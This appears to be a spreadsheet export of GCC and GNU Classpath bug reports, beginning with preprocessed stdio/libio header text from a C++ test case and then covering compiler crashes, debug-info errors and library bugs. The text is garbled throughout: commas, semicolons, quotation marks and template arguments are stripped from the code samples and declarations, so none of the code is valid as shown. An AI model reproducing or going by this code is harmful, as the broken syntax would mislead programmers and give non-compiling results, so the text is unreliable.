  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 350 /usr/include/libio.h 3
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
                                 size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
extern void _IO_cookie_init (struct _IO_cookie_file *__cfile int __read_write
                             void *__cookie _IO_cookie_io_functions_t __fns)
extern C {
extern int __underflow (_IO_FILE *) throw ()
extern int __uflow (_IO_FILE *) throw ()
extern int __overflow (_IO_FILE * int) throw ()
extern wint_t __wunderflow (_IO_FILE *) throw ()
extern wint_t __wuflow (_IO_FILE *) throw ()
extern wint_t __woverflow (_IO_FILE * wint_t) throw ()
# 432 /usr/include/libio.h 3
extern int _IO_getc (_IO_FILE *__fp) throw ()
extern int _IO_putc (int __c _IO_FILE *__fp) throw ()
extern int _IO_feof (_IO_FILE *__fp) throw ()
extern int _IO_ferror (_IO_FILE *__fp) throw ()
extern int _IO_peekc_locked (_IO_FILE *__fp) throw ()
extern void _IO_flockfile (_IO_FILE *) throw ()
extern void _IO_funlockfile (_IO_FILE *) throw ()
extern int _IO_ftrylockfile (_IO_FILE *) throw ()
# 462 /usr/include/libio.h 3
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
                        __gnuc_va_list int *__restrict) throw ()
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
                         __gnuc_va_list) throw ()
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) throw ()
extern size_t _IO_sgetn (_IO_FILE * void * size_t) throw ()
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) throw ()
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) throw ()
extern void _IO_free_backup_area (_IO_FILE *) throw ()
# 520 /usr/include/libio.h 3
}
# 73 /usr/include/stdio.h 2 3
typedef __gnuc_va_list va_list
# 86 /usr/include/stdio.h 3
typedef _G_fpos_t fpos_t
typedef _G_fpos64_t fpos64_t
# 138 /usr/include/stdio.h 3
# 1 /usr/include/bits/stdio_lim.h 1 3
# 139 /usr/include/stdio.h 2 3
extern struct _IO_FILE *stdin
extern struct _IO_FILE *stdout
extern struct _IO_FILE *stderr
extern int remove (__const char *__filename) throw ()
extern int rename (__const char *__old __const char *__new) throw ()
extern FILE *tmpfile (void) throw ()
# 173 /usr/include/stdio.h 3
extern char *tmpnam (char *__s) throw ()
extern FILE *tmpfile64 (void) throw ()
extern char *tmpnam_r (char *__s) throw ()
# 195 /usr/include/stdio.h 3
extern char *tempnam (__const char *__dir __const char *__pfx)
     throw () __attribute__ ((__malloc__))
extern int fclose (FILE *__stream) throw ()
extern int fflush (FILE *__stream) throw ()
extern int fflush_unlocked (FILE *__stream) throw ()
extern int fcloseall (void) throw ()
extern FILE *fopen (__const char *__restrict __filename
                    __const char *__restrict __modes) throw ()
extern FILE *freopen (__const char *__restrict __filename
                      __const char *__restrict __modes
                      FILE *__restrict __stream) throw ()
# 241 /usr/include/stdio.h 3
extern FILE *fopen64 (__const char *__restrict __filename
                      __const char *__restrict __modes) throw ()
extern FILE *freopen64 (__const char *__restrict __filename
                        __const char *__restrict __modes
                        FILE *__restrict __stream) throw ()
extern FILE *fdopen (int __fd __const char *__modes) throw ()
extern FILE *fopencookie (void *__restrict __magic_cookie
                          __const char *__restrict __modes
                          _IO_cookie_io_functions_t __io_funcs) throw ()
extern FILE *fmemopen (void *__s size_t __len __const char *__modes) throw ()
extern FILE *open_memstream (char **__restrict __bufloc
                             size_t *__restrict __sizeloc) throw ()
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) throw ()
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
                    int __modes size_t __n) throw ()
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
                       size_t __size) throw ()
extern void setlinebuf (FILE *__stream) throw ()
extern int fprintf (FILE *__restrict __stream
                    __const char *__restrict __format ...) throw ()
extern int printf (__const char *__restrict __format ...) throw ()
extern int sprintf (char *__restrict __s
                    __const char *__restrict __format ...) throw ()
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
                     __gnuc_va_list __arg) throw ()
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg)
     throw ()
extern int vsprintf (char *__restrict __s __const char *__restrict __format
                     __gnuc_va_list __arg) throw ()
extern int snprintf (char *__restrict __s size_t __maxlen
                     __const char *__restrict __format ...)
     throw () __attribute__ ((__format__ (__printf__ 3 4)))
extern int vsnprintf (char *__restrict __s size_t __maxlen
                      __const char *__restrict __format __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 3 0)))
extern int vasprintf (char **__restrict __ptr __const char *__restrict __f
                      __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 2 0)))
extern int __asprintf (char **__restrict __ptr
                       __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3)))
extern int asprintf (char **__restrict __ptr
                     __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3)))
extern int vdprintf (int __fd __const char *__restrict __fmt
                     __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 2 0)))
extern int dprintf (int __fd __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3)))
extern int fscanf (FILE *__restrict __stream
                   __const char *__restrict __format ...) throw ()
extern int scanf (__const char *__restrict __format ...) throw ()
extern int sscanf (__const char *__restrict __s
                   __const char *__restrict __format ...) throw ()
extern int vfscanf (FILE *__restrict __s __const char *__restrict __format
                    __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__scanf__ 2 0)))
extern int vscanf (__const char *__restrict __format __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__scanf__ 1 0)))
extern int vsscanf (__const char *__restrict __s
                    __const char *__restrict __format __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__scanf__ 2 0)))
extern int fgetc (FILE *__stream) throw ()
extern int getc (FILE *__stream) throw ()
extern int getchar (void) throw ()
extern int getc_unlocked (FILE *__stream) throw ()
extern int getchar_unlocked (void) throw ()
extern int fgetc_unlocked (FILE *__stream) throw ()
extern int fputc (int __c FILE *__stream) throw ()
extern int putc (int __c FILE *__stream) throw ()
extern int putchar (int __c) throw ()
extern int fputc_unlocked (int __c FILE *__stream) throw ()
extern int putc_unlocked (int __c FILE *__stream) throw ()
extern int putchar_unlocked (int __c) throw ()
extern int getw (FILE *__stream) throw ()
extern int putw (int __w FILE *__stream) throw ()
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream)
     throw ()
extern char *gets (char *__s) throw ()
extern char *fgets_unlocked (char *__restrict __s int __n
                             FILE *__restrict __stream) throw ()
# 463 /usr/include/stdio.h 3
extern __ssize_t __getdelim (char **__restrict __lineptr
                               size_t *__restrict __n int __delimiter
                               FILE *__restrict __stream) throw ()
extern __ssize_t getdelim (char **__restrict __lineptr
                             size_t *__restrict __n int __delimiter
                             FILE *__restrict __stream) throw ()
extern __ssize_t getline (char **__restrict __lineptr
                            size_t *__restrict __n
                            FILE *__restrict __stream) throw ()
extern int fputs (__const char *__restrict __s FILE *__restrict __stream)
     throw ()
extern int puts (__const char *__s) throw ()
extern int ungetc (int __c FILE *__stream) throw ()
extern size_t fread (void *__restrict __ptr size_t __size
                     size_t __n FILE *__restrict __stream) throw ()
extern size_t fwrite (__const void *__restrict __ptr size_t __size
                      size_t __n FILE *__restrict __s) throw ()
extern int fputs_unlocked (__const char *__restrict __s
                           FILE *__restrict __stream) throw ()
extern size_t fread_unlocked (void *__restrict __ptr size_t __size
                              size_t __n FILE *__restrict __stream) throw ()
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size
                               size_t __n FILE *__restrict __stream) throw ()
extern int fseek (FILE *__stream long int __off int __whence) throw ()
extern long int ftell (FILE *__stream) throw ()
extern void rewind (FILE *__stream) throw ()
# 530 /usr/include/stdio.h 3
extern int fseeko (FILE *__stream __off_t __off int __whence) throw ()
extern __off_t ftello (FILE *__stream) throw ()
# 546 /usr/include/stdio.h 3
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos)
     throw ()
extern int fsetpos (FILE *__stream __const fpos_t *__pos) throw ()
# 565 /usr/include/stdio.h 3
extern int fseeko64 (FILE *__stream __off64_t __off int __whence) throw ()
extern __off64_t ftello64 (FILE *__stream) throw ()
extern int fgetpos64 (FILE *__restrict __stream fpos64_t *__restrict __pos)
     throw ()
extern int fsetpos64 (FILE *__stream __const fpos64_t *__pos) throw ()
extern void clearerr (FILE *__stream) throw ()
extern int feof (FILE *__stream) throw ()
extern int ferror (FILE *__stream) throw ()
extern void clearerr_unlocked (FILE *__stream) throw ()
extern int feof_unlocked (FILE *__stream) throw ()
extern int ferror_unlocked (FILE *__stream) throw ()
extern void perror (__const char *__s) throw ()
# 1 /usr/include/bits/sys_errlist.h 1 3
# 27 /usr/include/bits/sys_errlist.h 3
extern int sys_nerr
extern __const char *__const sys_errlist[]
extern int _sys_nerr
extern __const char *__const _sys_errlist[]
# 602 /usr/include/stdio.h 2 3
extern int fileno (FILE *__stream) throw ()
extern int fileno_unlocked (FILE *__stream) throw ()
extern FILE *popen (__const char *__command __const char *__modes) throw ()
extern int pclose (FILE *__stream) throw ()
extern char *ctermid (char *__s) throw ()
extern char *cuserid (char *__s) throw ()
struct obstack
extern int obstack_printf (struct obstack *__restrict __obstack
                           __const char *__restrict __format ...)
     throw () __attribute__ ((__format__ (__printf__ 2 3)))
extern int obstack_vprintf (struct obstack *__restrict __obstack
                            __const char *__restrict __format
                            __gnuc_va_list __args)
     throw () __attribute__ ((__format__ (__printf__ 2 0)))
extern void flockfile (FILE *__stream) throw ()
extern int ftrylockfile (FILE *__stream) throw ()
extern void funlockfile (FILE *__stream) throw ()
# 676 /usr/include/stdio.h 3
# 1 /usr/include/bits/stdio.h 1 3
# 33 /usr/include/bits/stdio.h 3
inline int
vprintf (__const char *__restrict __fmt __gnuc_va_list __arg) throw ()
{
  return vfprintf (stdout __fmt __arg)
}
inline int
getchar (void) throw ()
{
  return _IO_getc (stdin)
}
inline int
getc_unlocked (FILE *__fp) throw ()
{
  return ((__fp)-&gt;_IO_read_ptr &gt;= (__fp)-&gt;_IO_read_end ? __uflow (__fp) : *
(unsigned char *) (__fp)-&gt;_IO_read_ptr++)
}
inline int
getchar_unlocked (void) throw ()
{
  return ((stdin)-&gt;_IO_read_ptr &gt;= (stdin)-&gt;_IO_read_end ? __uflow (stdin) : *
(unsigned char *) (stdin)-&gt;_IO_read_ptr++)
}
inline int
putchar (int __c) throw ()
{
  return _IO_putc (__c stdout)
}
inline int
fputc_unlocked (int __c FILE *__stream) throw ()
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow 
(__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-
&gt;_IO_write_ptr++ = (__c)))
}
inline int
putc_unlocked (int __c FILE *__stream) throw ()
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow 
(__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-
&gt;_IO_write_ptr++ = (__c)))
}
inline int
putchar_unlocked (int __c) throw ()
{
  return (((stdout)-&gt;_IO_write_ptr &gt;= (stdout)-&gt;_IO_write_end) ? __overflow 
(stdout (unsigned char) (__c)) : (unsigned char) (*(stdout)-&gt;_IO_write_ptr++ = 
(__c)))
}
inline __ssize_t
getline (char **__lineptr size_t *__n FILE *__stream) throw ()
{
  return __getdelim (__lineptr __n '\n' __stream)
}
inline int
feof_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
inline int
ferror_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
# 677 /usr/include/stdio.h 2 3
}
# 15 bugrep1.cpp 2
# 1 /usr/include/c++/3.2.2/exception 1 3
# 40 /usr/include/c++/3.2.2/exception 3
extern C++ {
namespace std
{
  class exception
  {
  public:
    exception() throw() { }
    virtual ~exception() throw()
    virtual const char* what() const throw()
  }
  class bad_exception : public exception
  {
  public:
    bad_exception() throw() { }
    virtual ~bad_exception() throw()
  }
  typedef void (*terminate_handler) ()
  typedef void (*unexpected_handler) ()
  terminate_handler set_terminate(terminate_handler) throw()
  void terminate() __attribute__ ((__noreturn__))
  unexpected_handler set_unexpected(unexpected_handler) throw()
  void unexpected() __attribute__ ((__noreturn__))
# 98 /usr/include/c++/3.2.2/exception 3
  bool uncaught_exception() throw()
}
namespace __gnu_cxx
{
# 111 /usr/include/c++/3.2.2/exception 3
  void __verbose_terminate_handler ()
}
}
# 16 bugrep1.cpp 2
class MyExcept : public std::exception
{
 public:
}
void foo()
{
   throw MyExcept()
}
int main()
{
   try
     {
        foo()
     }
   catch(std::exception E)
     {
        fprintf(stderrException caught:\n)
     }
   return 0
}</t>
  </si>
  <si>
    <t>lightspeed</t>
  </si>
  <si>
    <t>CLASSPATH-22786</t>
  </si>
  <si>
    <t>ByteLookupTable and ShortLookupTable / index out of bounds</t>
  </si>
  <si>
    <t>The following code throws an ArrayIndexOutOfBoundsException:
  public static void main(String[] args) {
    byte[] data = {105 104 103 102 101 100}
    ByteLookupTable t = new ByteLookupTable(100 data)
    // check 3-band source with 1-band lookup table
    int[] src = new int[] {100 101 102}
    int[] dst = t.lookupPixel(src null)
  }
This bug is triggered in the lookupPixel(src dst) methods of both the java.awt.image.ByteLookupTable and java.awt.image.ShortLookupTable classes when (a) dst is null and (b) the number of bands in the lookup table is less than the number of elements in src.
Looking at the source code it appears that 'dst' should be initialised with 'src.length' elements rather than 'numComponents' elements.
Mauve tests are attached.</t>
  </si>
  <si>
    <t>GCC-19370</t>
  </si>
  <si>
    <t>.size directive not emitted for mips-linux</t>
  </si>
  <si>
    <t>In config/mips/linux.h the macro ASM_DECLARE_FUNCTION_SIZE() doesn't actually 
emit the .size directive.  Testcase follows.
% cat tst.c
int
func1(void)
{
  return(1)
}
% mips-linux-gcc -c tst.c                   
% mips-linux-readelf -s tst.o             
Symbol table '.symtab' contains 11 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS tst.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    1
     3: 00000000     0 SECTION LOCAL  DEFAULT    3 
     4: 00000000     0 SECTION LOCAL  DEFAULT    4
     5: 00000000     0 SECTION LOCAL  DEFAULT    8 
     6: 00000000     0 SECTION LOCAL  DEFAULT    5
     7: 00000000     0 SECTION LOCAL  DEFAULT    6
     8: 00000000     0 SECTION LOCAL  DEFAULT    9
     9: 00000000     0 FUNC    GLOBAL DEFAULT    1 func1
    10: 00000000     0 OBJECT  GLOBAL DEFAULT  UND _gp_disp
Will attach a patch after bug is opened.</t>
  </si>
  <si>
    <t>angela</t>
  </si>
  <si>
    <t>GCC-7584</t>
  </si>
  <si>
    <t>Erroneous ambiguous base error on using declaration</t>
  </si>
  <si>
    <t>When compiling the code below gcc reports `A' is an ambiguous base of `C' for each using declaration and goes on to complain of C::T x that `typedef int A::T' is inaccessible. (Incidentally the ambiguous base messages give the line number of the opening brace of the class definition.) There is no ambiguity for either using declaration since A is a virtual base class. In the second there would be no ambiguity even if A were a non-virtual base since nested types can always be referred to unambiguously (para. 10.2/5).
Release:
3.1.1  (powerpc-eabi)
Environment:
Debian GNU/Linux x86 unstable
How-To-Repeat:
Compile the following with gcc -c
class A
{
public:
    typedef int T
    int a
}
class B : virtual private A
{
}
class C : virtual private A public B
{
public:
    using A::a
    using A::T
}
C::T x</t>
  </si>
  <si>
    <t>timb</t>
  </si>
  <si>
    <t>GCC-4797</t>
  </si>
  <si>
    <t>IBM powerpc/AIX: g++ produces</t>
  </si>
  <si>
    <t>Originally I wanted to investigate another bug concerning
libstdc++ (some static members of template classes such as
std::basic_string::_Rep::_S_terminal
seem to be not exported) as I have tried to create
a tiny shared object of my own the test program crashed
with segmentation fault.
As I am not an expert for this platform I can't recognize
at the first glance what might have gone wrong. At any rate
there was no diagnostics during the compilation and linking.
Please LMK if you need further details assistance etc.
Release:
gcc 3.0.2
Environment:
Reading specs from /usr/local/lib/gcc-lib/powerpc-ibm-aix4.3.3.0/3.0.2/specs
Configured with: /homes/combi/gawrilow/tmp/gcc-3.0.2/configure --with-gxx-include-dir=/usr/site-local/include/C++ --enable-languages=c++
Thread model: single
How-To-Repeat:
Unpack the attached archive (it creates a subdirectory
testcase) run 'make' in it then the executable
Amain.
(I know you dissuade from sending you archives. I hope
you can make an exception in this case as I have no idea how
to build and test a shared object using a single source file.)</t>
  </si>
  <si>
    <t>GCC-23288</t>
  </si>
  <si>
    <t>java.lang.Class's #getPackage() returns null</t>
  </si>
  <si>
    <t>The following code illustrates that java.lang.Class's method getMethod() returns
null. (The source for Class.java in 3.4.3 actually proves that it is
gnu.gcj.runtime.VMClassLoader that does it...)
--- 8&lt; 8&lt; 8&lt; ---
package men.gcjpackage
public class TestPackage
{
  public static void main(String[] args)
  {
    System.out.println(ClassLoader:  + TestPackage.class.getClassLoader() )
    System.out.println(Package:  + TestPackage.class.getPackage())
  } // main
} // TestPackage
--- 8&lt; 8&lt; 8&lt; ---
It produces the following output:
# ./testpackage
ClassLoader: gnu.gcj.runtime.VMClassLoader@10074fc0
Package: null
This is tested with libgcj 3.4.3 however Tom Tromey has proven this still exist
in latest HEAD (as of 2005-08-08):
http://gcc.gnu.org/ml/java/2005-08/msg00027.html
// Martin Egholm</t>
  </si>
  <si>
    <t>GCC-55059</t>
  </si>
  <si>
    <t>[4.8 Regression] DWARF missing concrete class definition</t>
  </si>
  <si>
    <t>Created attachment 28519
test program
This comes from http://sourceware.org/bugzilla/show_bug.cgi?id=14760
I think GCC master from today generates invalid or at least
questionable DWARF for the attached test case.
This causes gdb test suite failures.
The bug is in the DWARF for the instantiation of Base.
Current GCC emits:
 : Abbrev Number: 15 (DW_TAG_structure_type)
       DW_AT_name        : (indirect string offset: 0x191): Base	
       DW_AT_byte_size   : 1	
       DW_AT_decl_file   : 1	
       DW_AT_decl_line   : 30	
       DW_AT_declaration : 1	
       DW_AT_sibling     : 	
This has DW_AT_declaration -- but there is no concrete instance of the type.
Previous versions of GCC omitted this attribute.  For example Fedora 16
GCC:
 : Abbrev Number: 10 (DW_TAG_structure_type)
       DW_AT_name        : (indirect string offset: 0x135): Base	
       DW_AT_byte_size   : 1	
       DW_AT_decl_file   : 1	
       DW_AT_decl_line   : 30	
       DW_AT_sibling     : 	
I think the previous approach is preferable.</t>
  </si>
  <si>
    <t>GCC-32481</t>
  </si>
  <si>
    <t>ICE in df_refs_verify at df-scan.c:4058</t>
  </si>
  <si>
    <t>extracted from Wine. Pretty new (appeared in the last days).
/home/marcus/projects/gcc/BIN/bin/gcc -m32 -fPIC -c  -O2  ~/lolvldrv.i 
/home/marcus/lolvldrv.i: In function 'xx':
/home/marcus/lolvldrv.i:32: internal compiler error: in df_refs_verify at df-scan.c:4058</t>
  </si>
  <si>
    <t>GCC-25474</t>
  </si>
  <si>
    <t>Extra load for some FP code</t>
  </si>
  <si>
    <t>Take the following example:
double d
float f
void g(void)
{
  d = 1.0
  f = 1.0f
}
----
Currently we get:
_g:
        lis r9ha16(LC1)
        lis r2ha16(_d)
        lfs f13lo16(LC1)(r9)
        lfs f0lo16(LC1)(r9)
        lis r9ha16(_f)
        stfs f13lo16(_f)(r9)
        stfd f0lo16(_d)(r2)
        blr
--
We should get instead:
_g:
        lis r9ha16(LC1)
        lis r2ha16(_d)
        lfs f13lo16(LC1)(r9)
        lis r9ha16(_f)
        stfs f13lo16(_f)(r9)
        stfd f13lo16(_d)(r2)
        blr
Only one lfs.</t>
  </si>
  <si>
    <t>GCC-50958</t>
  </si>
  <si>
    <t>[C++0x] raw literal operator provides incorrect string for integer literal '0'</t>
  </si>
  <si>
    <t>gcc 4.7.0 20111029 (experimental) in C++0x mode rejects the following code:
//---
typedef decltype(sizeof(0)) size_type
constexpr size_type cstrlen_impl(const char* s size_type i)
{
  return s[i] ? cstrlen_impl(s i + 1) : i
}
constexpr size_type cstrlen(const char* s)
{
  return s ? cstrlen_impl(s 0) : throw 0
}
constexpr size_type operator  _lenraw(const char* digits)
{
  return cstrlen(digits)
}
static_assert(1_lenraw == 1 Ouch) // OK
static_assert(0_lenraw == 1 Ouch) // Error
//---
The error I'm getting is:
main.cpp|19|error: non-constant condition for static assertion|
main.cpp|19|  in constexpr expansion of 'operator _lenraw(0u)'|
main.cpp|15|  in constexpr expansion of 'cstrlen(digits)'|
main.cpp|10|error: expression '' is not a constant-expression|
This allows the conclusion that the octal integer literal '0' is incorrectly handled instead of the expected string length of 1 the raw literal operator gets a NULL string pointer. This seems to violate 2.14.8 p3 where 'n' would be equal to '0' which should lead to the effective string literal argument 0 in this case.</t>
  </si>
  <si>
    <t>GCC-2568</t>
  </si>
  <si>
    <t>libstdc++ build failure on sparcv9: character constant too long</t>
  </si>
  <si>
    <t>When configured with
env CC='cc -xarch=v9 -xildoff' ../configure --prefix=/pkgs/gcc-2.96 --enable-checking=no --enable-shared=no sparcv9-sun-solaris2.8
and using Sun's as and ld with the 04/16 CVS source
I get a good compare after stage2 of the bootstrap (cc is
the Sun compiler) but I get the following failures when
trying to build libstdc++ (as reported from a
make -i install
command):
c++locale.cc: In member function `void 
   std::numpunct::_M_initialize_numpunct(int*) [with _CharT = 
   wchar_t]':
c++locale.cc:66: character constant too long
c++locale.cc:67: character constant too long
c++locale.cc: In member function `void std::moneypunct&lt;_CharT 
   _Intl&gt;::_M_initialize_moneypunct(int*) [with _CharT = wchar_t bool _Intl = 
   false]':
c++locale.cc:96: character constant too long
c++locale.cc:97: character constant too long
and
../../../../libstdc++-v3/src/locale.cc: In constructor 
   `std::_Format_cache::_Format_cache() [with _CharT = wchar_t]':
../../../../libstdc++-v3/src/locale.cc:624: character constant too long
../../../../libstdc++-v3/src/locale.cc:624: character constant too long
and
c++locale.cc: In member function `void 
   std::numpunct::_M_initialize_numpunct(int*) [with _CharT = 
   wchar_t]':
c++locale.cc:66: character constant too long
c++locale.cc:67: character constant too long
c++locale.cc: In member function `void std::moneypunct&lt;_CharT 
   _Intl&gt;::_M_initialize_moneypunct(int*) [with _CharT = wchar_t bool _Intl = 
   false]':
c++locale.cc:96: character constant too long
c++locale.cc:97: character constant too long
and
../../../../libstdc++-v3/src/locale.cc: In constructor 
   `std::_Format_cache::_Format_cache() [with _CharT = wchar_t]':
../../../../libstdc++-v3/src/locale.cc:624: character constant too long
../../../../libstdc++-v3/src/locale.cc:624: character constant too long
which occurs in the following code:
#ifdef _GLIBCPP_USE_WCHAR_T
  template
    _Format_cache::_Format_cache()
    : _M_valid(true)
    _M_decimal_point(L'.') _M_thousands_sep(L'') // &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
    _M_truename(Ltrue) _M_falsename(Lfalse) _M_use_grouping(false)
    { }
#endif
All the problem code is of the same form.
This is the closest I've ever gottent to a successful
bootstrap that supports 64-bit code generation on Solaris
so if would be very nice if this could be fixed.
Brad
Release:
gcc-3.1
Environment:
sparcv9-sun-solaris2.8</t>
  </si>
  <si>
    <t>GCC-3254</t>
  </si>
  <si>
    <t>ICE at find_function_data at function.c:328 g++-v3/bits/locale_facets.tcc: In function `void__static_initialization_and_destruction_0(int int)__static_initialization_and_destruction_0(int int)''</t>
  </si>
  <si>
    <t>When I charange to compile Grail 
which uses template very aggressively by gcc I gets Internal compiler error.
Release:
3.0
Environment:
System: SunOS mule 5.8 Generic_108528-06 sun4u sparc SUNWUltra-80
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.0/configure --prefix=/home/akr/src/gcc
How-To-Repeat:
% cat a.C
#include        
class bits
{
  void extract()
}
void
bits::extract() 
{
  cout &lt;&lt; 0
}
template 
class array {
protected:
  int i
  static array* pool
  static int max_pool
public:
  ~array()
}
template 
array* array::pool =
  (array*) new char[array::max_pool * sizeof(array)]
template 
array::~array()
{
  pool[0].i = 0
}
template 
class set : public array
{
}
template 
class inst
{
}
template 
class fm
{
  set &gt; arcs
}
int
main(int argc char** argv)
{
  fm a
  return 0
}
% bin/gcc a.C
a.C:4: warning: all member functions in class `bits' are private
include/g++-v3/bits/locale_facets.tcc: In function `void 
   __static_initialization_and_destruction_0(int int)':
include/g++-v3/bits/locale_facets.tcc:26: Internal compiler error in 
   find_function_data at function.c:328
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
% bin/gcc -v 
Reading specs from bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.0/specs
Configured with: ../gcc-3.0/configure --prefix=/home/akr/src/gcc
Thread model: posix
gcc version 3.0
%
Unformatted:
 % bin/gcc -v
 Reading specs from bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.0/specs
 Configured with: ../gcc-3.0/configure --prefix=/home/akr/src/gcc
 Thread model: posix
 gcc version 3.0</t>
  </si>
  <si>
    <t>akr</t>
  </si>
  <si>
    <t>GCC-3490</t>
  </si>
  <si>
    <t>internal error using static synchronized</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #99038.
  Please CC 99038-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/99038 ]
[ first sent to http://gcc.gnu.org/ml/java/2001-05/msg00311.html]
//  gcj-3.0 -c -O1 Bug.java
//  Bug.java: In class `Bug':
//  Bug.java: In method `Bug.get()':
//  Bug.java:3: Internal error: Segmentation fault
class Bug {
    static synchronized Object get(int i) { return null }
    static synchronized Object get() { return get(1) }
}
Tom Tromey added: This fails for me (on x86) with -O1 but not with -O0.
Release:
3.0 (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: i686
host: i386-linux
build: i386-linux
target: i386-linux
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>99038-quiet</t>
  </si>
  <si>
    <t>GCC-46204</t>
  </si>
  <si>
    <t>g++.dg/torture/stackalign/throw-1.C fails to compile on IA64</t>
  </si>
  <si>
    <t>I am not sure exactly where this is going wrong but when g++.dg/torture/stackalign/throw-1.C is compiled with -O3 -funroll-loops on IA64 I get an undefined label.
Here is a cutdown test case based on that test:
int global global2
int main()
{
        int ijklmn
   for (i=0 i &lt; global i++)
   for (k=0 k &lt; j k++)
   for (l=0 l &lt; k l++)
   for (m=0 m &lt; l m++)
       global2 = k
 throw 0
}
When I compile it I get:
g++ -O3 -funroll-loops x.C
/tmp/ccVWUtRi.o: In function `main':
x.C:(.text+0xc2): undefined reference to `.L34'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-29388</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid nested name specifier</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE since GCC 4.0.0:
=============================================
template struct A
{
  typedef int T
  void foo()
}
template void A::T::foo() {}
=============================================
bug.cc:7: internal compiler error: in is_ancestor at cp/name-lookup.c:2250
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-34138</t>
  </si>
  <si>
    <t>[4.3 Regression] verify_ssa failed (found real variable when subvariables should have appeared)</t>
  </si>
  <si>
    <t>With current trunk on sparc:
tbm@devel-tbm:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 busybox-ash.c
busybox-ash.c: In function 'dotcmd':
busybox-ash.c:15: error: found real variable when subvariables should have appeared
while verifying SSA_NAME shellparam_17 in statement
# shellparam_17 = VDEF 
# SFT.31_9 = VDEF 
# SMT.38_10 = VDEF 
# SMT.39_11 = VDEF 
free (D.1273_3)
busybox-ash.c:15: error: found real variable when subvariables should have appeared
while verifying SSA_NAME shellparam_18 in statement
# shellparam_18 = VDEF 
# SFT.31_13 = VDEF 
# SMT.38_14 = VDEF 
# SMT.39_15 = VDEF 
free (D.1274_4)
busybox-ash.c:15: error: found real variable when subvariables should have appeared
busybox-ash.c:15: error: in statement
# shellparam_17 = VDEF 
# SFT.31_9 = VDEF 
# SMT.38_10 = VDEF 
# SMT.39_11 = VDEF  { shellparam SFT.31 SMT.38 SMT.39 }
free (D.1273_3)
busybox-ash.c:15: internal compiler error: verify_ssa failed
Please submit a full bug report
This didn't happen with 20071105.</t>
  </si>
  <si>
    <t>GCC-40667</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] stack frames are generated even with -fomit-frame-pointer</t>
  </si>
  <si>
    <t>This is performance regression from 4.3 (which was better).
On i386 when -O2 -fomit-frame-pointer -mpreferred-stack-boundary=2 is used and function operates with long long values stack frame is generated although it doesn't have to be.
Example:
int f(long long x)
int g(long long x)
{
        f(x)
        return 0
}
